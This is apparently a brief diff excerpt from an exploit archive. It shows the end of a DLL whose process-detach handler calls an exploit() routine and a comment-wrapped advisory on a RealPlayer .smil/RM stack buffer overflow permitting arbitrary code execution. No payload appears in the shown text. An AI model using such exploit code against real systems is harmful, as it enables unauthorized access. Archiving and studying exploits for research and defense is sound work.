+	case DLL_PROCESS_DETACH:
+		exploit();
+		break;
+	}
+	return TRUE;
+}

exploits/windows/local/26497.c

@@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/15381/info
 
 RealNetworks RealPlayer and RealOne Player are reported prone to a remote stack-based buffer-overflow vulnerability. The applications fail to perform boundary checks when parsing RM (Real Media) files. A remote attacker may execute arbitrary code on a vulnerable computer to gain unauthorized access.
 
 This vulnerability is reported to occur in RealNetworks products for Microsoft Windows, Linux, and Apple Mac platforms. 
+*/
 
 /* RealPlayer .smil file buffer overflow
 Coded by nolimit@CiSO & Buzzdee